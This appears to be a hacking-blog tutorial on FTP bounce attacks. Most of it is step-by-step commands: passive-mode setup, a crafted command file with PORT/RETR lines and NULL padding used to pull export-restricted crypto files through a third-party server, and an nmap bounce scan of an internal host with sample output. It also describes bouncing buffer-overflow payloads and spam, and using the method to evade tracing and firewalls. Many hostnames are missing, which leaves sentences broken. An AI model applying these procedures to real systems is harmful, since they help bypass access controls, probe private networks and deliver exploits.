Ethical Hacking Mr. Hacker

How to Hack Internal Private Systems Using FTP Bounce Attack?

Hello hackers, so today we are going to learn how can we attack the internal ftp private servers for a public server which we have exploited earlier to get the login user credentials for FTP port using Brute force with Hydra. This method is known as FTP Bounce attack as we deploy packets which bounce through an intermediate public server to the private victim machine.

The motive

You are a user in at a foreign region with IP address F.F.F.F and want to retrieve cryptographic source code from in US. The FTP server at is set up so as to allow you the connection, but deny the access to the crypto sources because your source IP address is a non-US site [as the FTP server can determine your DNS server]. In any case, you cannot directly retrieve the source code from’s server.

However, allow to download crypto sources because is of US. It happens you know that incoming data for is a worldwide write-able directory, through which any anonymous user can drop files and read them back. Let us assume that the IP address for’s is C.C.C.C.

FTP Bounce secure connection

The attack

Now assuming you have an FTP server that does passive mode. Open an FTP connection to your own machine’s real IP address [not localhost] and log in. Change to a convenient directory that you have the write access to, and then do:

	quote "pasv"
	quote "stor foobar"

Take note of the address and port that are returned from the PASV command, F,F,F,F,X,X. This FTP session will now hang, so background it or flip to another window or something to proceed with the rest of this.

Construct a file containing FTP server commands. Let’s call this file”instrs". It will look like this:

	user ftp
	pass [email protected]
	cwd /export-restricted-crypto
	type i
	port F,F,F,F,X,X
	retr crypto.tar.Z
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@

F,F,F,F,X,X is the same address and port that your own machine handed you on the first connection. The trash at the end is extra lines you create, each containing 250 NULLS and nothing else, enough to fill up about 60K of extra data.

Open an FTP connection to, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your”instrs” file over and then tells’s FTP server to connect to’s FTP server using your file as the commands:

	put instrs
	quote "port C,C,C,C,0,21"
	quote "retr instrs"

Crypto.tar.Z should now show up as”foobar” on your machine via your first FTP connection. If the connection to didn’t die by itself due to an apparently common server bug, clean up by deleting “instrs” and exciting. Otherwise, you’ll have to reconnect to finish.

FTP Bounce Port Scanning
You can use the nmap port scanner in Unix and Windows environments to perform an FTP bounce port scan, using the -P0 and -b flags in the following manner:

nmap -P0 -b username:[email protected]:port <target host>

shows an FTP bounce port scan being launched through the Internet-based to scan an internal host at, a known address previously enumerated through DNS querying.

FTP bounce scanning with nmap

# nmap -P0 -b -p21,22,23,25,80Starting nmap 3.45 ( )

Interesting ports on (

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp closed telnet

25/tcp closed smtp

80/tcp open http

Nmap run completed — 1 IP address (1 host up) scanned in 12 seconds

Note :
When performing any type of bounce port scan with nmap, you should specify the -P0 option. This will prevent an attacker from probing the target host to ascertain whether it is up.

FTP Bounce Exploit Payload Delivery

If you can upload a binary file containing a crafted buffer overflow string to an FTP server that in turn is vulnerable to bounce attack, you can then send that information to a specific service port (either on the local host or other addresses). This concept is shown in Figure 8-2.

 An illustration of the FTP payload bounce attack


FTP Bounce firewall block

For this type of attack to be effective, an attacker needs to authenticate and log into the FTP server, locate a writeable directory, and test to see if the server is susceptible to FTP bounce attack. Solaris 2.6 is an excellent example because in its default state it is vulnerable to FTP bounce and RPC service overflow attacks. Binary exploit data isn’t the only type of payload that can be bounced through a vulnerable FTP server: spammers have also sent an unsolicited email this way.

Other possibilities

Despite the fact that such third-party connections are one-way only, they can be used for all kinds of things. Similar methods can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time. A little thought will bring the realisation of numerous other scary possibilities.

FTP Bounce Description

Connections launched this way come from source port 20, which some sites allow through their firewalls in an effort to deal with the “ftp-data” problem. For some purposes, this can be the next best thing to source-routed attacks and is likely to succeed where source routeing fails against packet filters. And it’s all made possible by the way the FTP protocol spec was written, allowing control connections to come from anywhere and data connections to go anywhere.

If you like this article kindly rate it and do share. if you have any queries please comment below and let us know how you felt about the article. To know how to find devices on the internet to hack into them read the article on How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

Thank you.

The following two tabs change content below.

Anuj Mishra

Admin, Founder & Chief Editor at HackeRoyale
Engineer. Blogger. Ethical hacker. Penetration Tester. Deep Webbie. Bug hunter. Security Analyst. Web Developer. Techie. Programmer. Foodie. Music Lover. Traveller. Enthusiast.

Comment Now !